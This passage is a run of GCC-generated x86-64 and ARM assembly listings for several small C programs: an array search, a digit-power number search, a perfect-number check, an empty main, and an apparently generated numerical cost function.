0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "124527.c" .text .section .rodata .align 2 .LC0: .ascii "%d\000" .align 2 .LC1: .ascii "Element found at positions %d\000" .align 2 .LC2: .ascii ", %d\000" .align 2 .LC3: .ascii "Element found at position %d\000" .align 2 .LC4: .ascii "Element not found\000" .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 40024 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #39936 sub sp, sp, #88 ldr r3, .L12 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 mov r3, #0 str r3, [r2, #-3152] sub r3, fp, #39936 sub r3, r3, #4 sub r3, r3, #88 mov r1, r3 ldr r0, .L12+4 bl __isoc99_scanf sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 mov r3, #0 str r3, [r2, #-3148] b .L2 .L3: sub r3, fp, #39936 sub r3, r3, #4 sub r3, r3, #68 sub r2, fp, #36864 sub r2, r2, #4 ldr r2, [r2, #-3148] lsl r2, r2, #2 add r3, r3, r2 mov r1, r3 ldr r0, .L12+4 bl __isoc99_scanf sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3148] add r3, r3, #1 str r3, [r2, #-3148] .L2: sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3160] sub r2, fp, #36864 sub r2, r2, #4 ldr r2, [r2, #-3148] cmp r2, r3 blt .L3 sub r3, fp, #39936 sub r3, r3, #4 sub r3, r3, #84 mov r1, r3 ldr r0, .L12+4 bl __isoc99_scanf sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 mov r3, #0 str r3, [r2, #-3144] b .L4 .L8: sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3144] lsl r3, r3, #2 add r3, r2, r3 ldr r2, [r3, #-3140] sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3156] cmp r2, r3 bne .L5 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3156] cmn r3, #18 bne .L6 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3152] cmp r3, #0 bne .L7 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3144] add r3, r3, #1 mov r1, r3 ldr r0, .L12+8 bl printf sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 mov r3, #1 str r3, [r2, #-3152] b .L5 .L7: sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3144] add r3, r3, #1 mov r1, r3 ldr r0, .L12+12 bl printf b .L5 .L6: sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3144] add r3, r3, #1 mov r1, r3 ldr r0, .L12+16 bl printf sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 mov r3, #1 str r3, [r2, #-3152] .L5: sub r3, fp, #36864 sub r3, r3, #4 mov r2, r3 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3144] add r3, r3, #1 str r3, [r2, #-3144] .L4: sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3160] sub r2, fp, #36864 sub r2, r2, #4 ldr r2, [r2, #-3144] cmp r2, r3 blt .L8 sub r3, fp, #36864 sub r3, r3, #4 ldr r3, [r3, #-3152] cmp r3, #0 bne .L9 ldr r0, .L12+20 bl printf .L9: mov r3, #0 ldr r2, .L12 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L11 bl __stack_chk_fail .L11: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L13: .align 2 .L12: .word .LC5 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "343033.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "%d%d%d%d%d%d %d\n" .LC1: .string "%d" .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov esi, 4 mov edi, 10 call calloc@PLT mov QWORD PTR -8[rbp], rax mov DWORD PTR -24[rbp], 0 jmp .L2 .L3: mov eax, DWORD PTR -24[rbp] imul eax, eax imul eax, DWORD PTR -24[rbp] imul eax, DWORD PTR -24[rbp] mov edx, DWORD PTR -24[rbp] movsx rdx, edx lea rcx, 0[0+rdx*4] mov rdx, QWORD PTR -8[rbp] add rdx, rcx imul eax, DWORD PTR -24[rbp] mov DWORD PTR [rdx], eax add DWORD PTR -24[rbp], 1 .L2: cmp DWORD PTR -24[rbp], 9 jle .L3 mov DWORD PTR -20[rbp], 0 mov DWORD PTR -48[rbp], 0 jmp .L4 .L16: mov DWORD PTR -44[rbp], 0 jmp .L5 .L15: mov DWORD PTR -40[rbp], 0 jmp .L6 .L14: mov DWORD PTR -36[rbp], 0 jmp .L7 .L13: mov DWORD PTR -32[rbp], 0 jmp .L8 .L12: mov DWORD PTR -28[rbp], 0 jmp .L9 .L11: mov eax, DWORD PTR -48[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rax, rdx mov edx, DWORD PTR [rax] mov eax, DWORD PTR -44[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rax, rcx mov eax, DWORD PTR [rax] add edx, eax mov eax, DWORD PTR -40[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rax, rcx mov eax, DWORD PTR [rax] add edx, eax mov eax, DWORD PTR -36[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rax, rcx mov eax, DWORD PTR [rax] add edx, eax mov eax, DWORD PTR -32[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rax, rcx mov eax, DWORD PTR [rax] add edx, eax mov eax, DWORD PTR -28[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -8[rbp] add rax, rcx mov eax, DWORD PTR [rax] add eax, edx mov DWORD PTR -16[rbp], eax mov edx, DWORD PTR -44[rbp] mov eax, edx sal eax, 2 add eax, edx add eax, eax mov edx, eax mov eax, DWORD PTR -48[rbp] add edx, eax mov eax, DWORD PTR -40[rbp] imul eax, eax, 100 add edx, eax mov eax, DWORD PTR -36[rbp] imul eax, eax, 1000 add edx, eax mov eax, DWORD PTR -32[rbp] imul eax, eax, 10000 add edx, eax mov eax, DWORD PTR -28[rbp] imul eax, eax, 100000 add eax, edx mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -16[rbp] cmp eax, DWORD PTR -12[rbp] jne .L10 cmp DWORD PTR -12[rbp], 1 je .L10 mov r8d, DWORD PTR -44[rbp] mov edi, DWORD PTR -40[rbp] mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] mov eax, DWORD PTR -28[rbp] mov esi, DWORD PTR -12[rbp] push rsi mov esi, DWORD PTR -48[rbp] push rsi mov r9d, r8d mov r8d, edi mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT add rsp, 16 mov eax, DWORD PTR -12[rbp] add DWORD PTR -20[rbp], eax .L10: add DWORD PTR -28[rbp], 1 .L9: cmp DWORD PTR -28[rbp], 9 jle .L11 add DWORD PTR -32[rbp], 1 .L8: cmp DWORD PTR -32[rbp], 9 jle .L12 add DWORD PTR -36[rbp], 1 .L7: cmp DWORD PTR -36[rbp], 9 jle .L13 add DWORD PTR -40[rbp], 1 .L6: cmp DWORD PTR -40[rbp], 9 jle .L14 add DWORD PTR -44[rbp], 1 .L5: cmp DWORD PTR -44[rbp], 9 jle .L15 add DWORD PTR -48[rbp], 1 .L4: cmp DWORD PTR -48[rbp], 9 jle .L16 mov eax, DWORD PTR -20[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "343033.c" .text .section .rodata .align 2 .LC0: .ascii "%d%d%d%d%d%d %d\012\000" .align 2 .LC1: .ascii "%d\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #64 mov r1, #4 mov r0, #10 bl calloc mov r3, r0 str r3, [fp, #-16] mov r3, #0 str r3, [fp, #-24] b .L2 .L3: ldr r3, [fp, #-24] mov r2, r3 mul r2, r3, r2 mov r3, r2 ldr r2, [fp, #-24] mul r3, r2, r3 ldr r2, [fp, #-24] mul r2, r3, r2 ldr r3, [fp, #-24] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r1, [fp, #-24] mul r2, r1, r2 str r2, [r3] ldr r3, [fp, #-24] add r3, r3, #1 str r3, [fp, #-24] .L2: ldr r3, [fp, #-24] cmp r3, #9 ble .L3 mov r3, #0 str r3, [fp, #-20] mov r3, #0 str r3, [fp, #-48] b .L4 .L16: mov r3, #0 str r3, [fp, #-44] b .L5 .L15: mov r3, #0 str r3, [fp, #-40] b .L6 .L14: mov r3, #0 str r3, [fp, #-36] b .L7 .L13: mov r3, #0 str r3, [fp, #-32] b .L8 .L12: mov r3, #0 str r3, [fp, #-28] b .L9 .L11: ldr r3, [fp, #-48] lsl r3, r3, #2 ldr r2, [fp, #-16] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-44] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r3, [r3] add r2, r2, r3 ldr r3, [fp, #-40] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r3, [r3] add r2, r2, r3 ldr r3, [fp, #-36] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r3, [r3] add r2, r2, r3 ldr r3, [fp, #-32] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r3, [r3] add r2, r2, r3 ldr r3, [fp, #-28] lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r3, [r3] add r3, r2, r3 str r3, [fp, #-12] ldr r2, [fp, #-44] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #1 mov r2, r3 ldr r3, [fp, #-48] add r1, r2, r3 ldr r2, [fp, #-40] mov r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r2, r3, #2 add r3, r3, r2 lsl r3, r3, #2 add r1, r1, r3 ldr r2, [fp, #-36] mov r3, r2 lsl r3, r3, #5 sub r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r3, r3, #3 add r1, r1, r3 ldr r2, [fp, #-32] mov r3, r2 lsl r3, r3, #5 sub r3, r3, r2 lsl r3, r3, #2 add r3, r3, r2 lsl r2, r3, #2 add r3, r3, r2 lsl r3, r3, #4 add r2, r1, r3 ldr r3, [fp, #-28] ldr r1, .L18 mul r3, r1, r3 add r3, r2, r3 str r3, [fp, #-8] ldr r2, [fp, #-12] ldr r3, [fp, #-8] cmp r2, r3 bne .L10 ldr r3, [fp, #-8] cmp r3, #1 beq .L10 ldr r3, [fp, #-8] str r3, [sp, #12] ldr r3, [fp, #-48] str r3, [sp, #8] ldr r3, [fp, #-44] str r3, [sp, #4] ldr r3, [fp, #-40] str r3, [sp] ldr r3, [fp, #-36] ldr r2, [fp, #-32] ldr r1, [fp, #-28] ldr r0, .L18+4 bl printf ldr r2, [fp, #-20] ldr r3, [fp, #-8] add r3, r2, r3 str r3, [fp, #-20] .L10: ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L9: ldr r3, [fp, #-28] cmp r3, #9 ble .L11 ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] .L8: ldr r3, [fp, #-32] cmp r3, #9 ble .L12 ldr r3, [fp, #-36] add r3, r3, #1 str r3, [fp, #-36] .L7: ldr r3, [fp, #-36] cmp r3, #9 ble .L13 ldr r3, [fp, #-40] add r3, r3, #1 str r3, [fp, #-40] .L6: ldr r3, [fp, #-40] cmp r3, #9 ble .L14 ldr r3, [fp, #-44] add r3, r3, #1 str r3, [fp, #-44] .L5: ldr r3, [fp, #-44] cmp r3, #9 ble .L15 ldr r3, [fp, #-48] add r3, r3, #1 str r3, [fp, #-48] .L4: ldr r3, [fp, #-48] cmp r3, #9 ble .L16 ldr r1, [fp, #-20] ldr r0, .L18+8 bl printf mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L19: .align 2 .L18: .word 100000 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "384233.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Enter the number : " .LC1: .string "%d is a perfect number\n" .LC2: .string "%d is not a perfect number\n" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 lea rdi, .LC0[rip] call getInt mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -4[rbp] mov edi, eax call is_perfect test eax, eax je .L2 mov eax, DWORD PTR -4[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT jmp .L3 .L2: mov eax, DWORD PTR -4[rbp] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT .L3: mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .globl is_perfect .type is_perfect, @function is_perfect: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -20[rbp], edi mov DWORD PTR -8[rbp], 0 mov DWORD PTR -4[rbp], 1 jmp .L6 .L8: mov eax, DWORD PTR -20[rbp] cdq idiv DWORD PTR -4[rbp] mov eax, edx test eax, eax jne .L7 mov eax, DWORD PTR -4[rbp] add DWORD PTR -8[rbp], eax .L7: add DWORD PTR -4[rbp], 1 .L6: mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -20[rbp] jl .L8 mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -8[rbp] sete al movzx eax, al pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size is_perfect, .-is_perfect .section .rodata .LC3: .string "%s" .LC4: .string "%d" .text .globl getInt .type getInt, @function getInt: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -12[rbp], 0 mov rax, QWORD PTR -24[rbp] mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT lea rax, -12[rbp] mov rsi, rax lea rdi, .LC4[rip] mov eax, 0 call __isoc99_scanf@PLT mov eax, DWORD PTR -12[rbp] mov rdx, QWORD PTR -8[rbp] sub rdx, QWORD PTR fs:40 je .L12 call __stack_chk_fail@PLT .L12: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size getInt, .-getInt .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "384233.c" .text .section .rodata .align 2 .LC0: .ascii "Enter the number : \000" .align 2 .LC1: .ascii "%d is a perfect number\012\000" .align 2 .LC2: .ascii "%d is not a perfect number\012\000" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 ldr r0, .L5 bl getInt str r0, [fp, #-8] ldr r0, [fp, #-8] bl is_perfect mov r3, r0 cmp r3, #0 beq .L2 ldr r1, [fp, #-8] ldr r0, .L5+4 bl printf b .L3 .L2: ldr r1, [fp, #-8] ldr r0, .L5+8 bl printf .L3: mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L6: .align 2 .L5: .word .LC0 .word .LC1 .word .LC2 .size main, .-main .global __aeabi_idivmod .align 2 .global is_perfect .syntax unified .arm .fpu softvfp .type is_perfect, %function is_perfect: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] mov r3, #0 str r3, [fp, #-12] mov r3, #1 str r3, [fp, #-8] b .L8 .L10: ldr r3, [fp, #-16] ldr r1, [fp, #-8] mov r0, r3 bl __aeabi_idivmod mov r3, r1 cmp r3, #0 bne .L9 ldr r2, [fp, #-12] ldr r3, [fp, #-8] add r3, r2, r3 str r3, [fp, #-12] .L9: ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L8: ldr r2, [fp, #-8] ldr r3, [fp, #-16] cmp r2, r3 blt .L10 ldr r2, [fp, #-16] ldr r3, [fp, #-12] cmp r2, r3 moveq r3, #1 movne r3, #0 and r3, r3, #255 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size is_perfect, .-is_perfect .section .rodata .align 2 .LC3: .ascii "%s\000" .align 2 .LC4: .ascii "%d\000" .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global getInt .syntax unified .arm .fpu softvfp .type getInt, %function getInt: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] ldr r3, .L15 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #0 str r3, [fp, #-12] ldr r1, [fp, #-16] ldr r0, .L15+4 bl printf sub r3, fp, #12 mov r1, r3 ldr r0, .L15+8 bl __isoc99_scanf ldr r3, [fp, #-12] ldr r2, .L15 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L14 bl __stack_chk_fail .L14: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L16: .align 2 .L15: .word .LC5 .word .LC3 .word .LC4 .size getInt, .-getInt .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "634360.c" .intel_syntax noprefix .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "634360.c" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "474132.c" .intel_syntax noprefix .text .globl long_cost_y_0_fun_sq .type long_cost_y_0_fun_sq, @function long_cost_y_0_fun_sq: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -8[rbp] mulsd xmm0, xmm0 movq rax, xmm0 movq xmm0, rax pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size long_cost_y_0_fun_sq, .-long_cost_y_0_fun_sq .section .rodata .align 16 .type long_cost_y_0_fun_s0, @object .size long_cost_y_0_fun_s0, 28 long_cost_y_0_fun_s0: .long 3 .long 1 .long 0 .long 3 .long 0 .long 1 .long 2 .align 16 .type long_cost_y_0_fun_s1, @object .size long_cost_y_0_fun_s1, 20 long_cost_y_0_fun_s1: .long 1 .long 1 .long 0 .long 1 .long 0 .align 32 .type long_cost_y_0_fun_s2, @object .size long_cost_y_0_fun_s2, 36 long_cost_y_0_fun_s2: .long 5 .long 1 .long 0 .long 5 .long 0 .long 1 .long 2 .long 3 .long 4 .text .type long_cost_y_0_fun_f0, @function long_cost_y_0_fun_f0: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 88 mov QWORD PTR -56[rbp], rdi mov QWORD PTR -64[rbp], rsi mov QWORD PTR -72[rbp], rdx mov QWORD PTR -80[rbp], rcx mov DWORD PTR -84[rbp], r8d mov rax, QWORD PTR -56[rbp] add rax, 16 mov rax, QWORD PTR [rax] test rax, rax je .L4 mov rax, QWORD PTR -56[rbp] add rax, 16 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 16[rax] jmp .L5 .L4: pxor xmm0, xmm0 .L5: movsd QWORD PTR -48[rbp], xmm0 mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L6 mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR [rax] jmp .L7 .L6: pxor xmm0, xmm0 .L7: movsd QWORD PTR -40[rbp], xmm0 movsd xmm0, QWORD PTR -48[rbp] subsd xmm0, QWORD PTR -40[rbp] movsd QWORD PTR -48[rbp], xmm0 movsd xmm0, QWORD PTR .LC1[rip] movsd QWORD PTR -32[rbp], xmm0 mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L8 mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 8[rax] jmp .L9 .L8: pxor xmm0, xmm0 .L9: movsd QWORD PTR -24[rbp], xmm0 movsd xmm0, QWORD PTR -32[rbp] mulsd xmm0, QWORD PTR -24[rbp] movsd QWORD PTR -32[rbp], xmm0 mov rax, QWORD PTR -24[rbp] movq xmm0, rax call long_cost_y_0_fun_sq movq rax, xmm0 mov QWORD PTR -16[rbp], rax movsd xmm0, QWORD PTR .LC2[rip] movsd QWORD PTR -8[rbp], xmm0 movsd xmm0, QWORD PTR -16[rbp] divsd xmm0, QWORD PTR -8[rbp] movsd QWORD PTR -16[rbp], xmm0 movsd xmm0, QWORD PTR -32[rbp] addsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR -32[rbp], xmm0 movsd xmm0, QWORD PTR .LC3[rip] movsd QWORD PTR -16[rbp], xmm0 movsd xmm0, QWORD PTR -32[rbp] addsd xmm0, QWORD PTR -16[rbp] movsd QWORD PTR -32[rbp], xmm0 movsd xmm0, QWORD PTR -48[rbp] subsd xmm0, QWORD PTR -32[rbp] movsd QWORD PTR -48[rbp], xmm0 movsd xmm0, QWORD PTR .LC4[rip] movsd QWORD PTR -32[rbp], xmm0 movsd xmm0, QWORD PTR -32[rbp] addsd xmm0, QWORD PTR -24[rbp] movsd QWORD PTR -32[rbp], xmm0 movsd xmm0, QWORD PTR -48[rbp] divsd xmm0, QWORD PTR -32[rbp] movsd QWORD PTR -48[rbp], xmm0 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L10 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR -48[rbp] movsd QWORD PTR [rax], xmm0 .L10: mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L11 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] add rax, 8 movsd xmm0, QWORD PTR -40[rbp] movsd QWORD PTR [rax], xmm0 .L11: mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L12 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] add rax, 16 movsd xmm0, QWORD PTR -24[rbp] movsd QWORD PTR [rax], xmm0 .L12: mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L13 mov rax, QWORD PTR -56[rbp] mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR 16[rax] jmp .L14 .L13: pxor xmm0, xmm0 .L14: movsd QWORD PTR -24[rbp], xmm0 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L15 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] add rax, 24 movsd xmm0, QWORD PTR -24[rbp] movsd QWORD PTR [rax], xmm0 .L15: mov rax, QWORD PTR -56[rbp] add rax, 8 mov rax, QWORD PTR [rax] test rax, rax je .L16 mov rax, QWORD PTR -56[rbp] add rax, 8 mov rax, QWORD PTR [rax] movsd xmm0, QWORD PTR [rax] jmp .L17 .L16: pxor xmm0, xmm0 .L17: movsd QWORD PTR -24[rbp], xmm0 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] test rax, rax je .L18 mov rax, QWORD PTR -64[rbp] mov rax, QWORD PTR [rax] add rax, 32 movsd xmm0, QWORD PTR -24[rbp] movsd QWORD PTR [rax], xmm0 .L18: mov eax, 0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size long_cost_y_0_fun_f0, .-long_cost_y_0_fun_f0 .globl long_cost_y_0_fun .type long_cost_y_0_fun, @function long_cost_y_0_fun: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 40 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov QWORD PTR -24[rbp], rdx mov QWORD PTR -32[rbp], rcx mov DWORD PTR -36[rbp], r8d mov edi, DWORD PTR -36[rbp] mov rcx, QWORD PTR -32[rbp] mov rdx, QWORD PTR -24[rbp] mov rsi, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov r8d, edi mov rdi, rax call long_cost_y_0_fun_f0 leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size long_cost_y_0_fun, .-long_cost_y_0_fun .globl long_cost_y_0_fun_alloc_mem .type long_cost_y_0_fun_alloc_mem, @function long_cost_y_0_fun_alloc_mem: .LFB3: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE3: .size long_cost_y_0_fun_alloc_mem, .-long_cost_y_0_fun_alloc_mem .globl long_cost_y_0_fun_init_mem .type long_cost_y_0_fun_init_mem, @function long_cost_y_0_fun_init_mem: .LFB4: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE4: .size long_cost_y_0_fun_init_mem, .-long_cost_y_0_fun_init_mem .globl long_cost_y_0_fun_free_mem .type long_cost_y_0_fun_free_mem, @function long_cost_y_0_fun_free_mem: .LFB5: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE5: .size 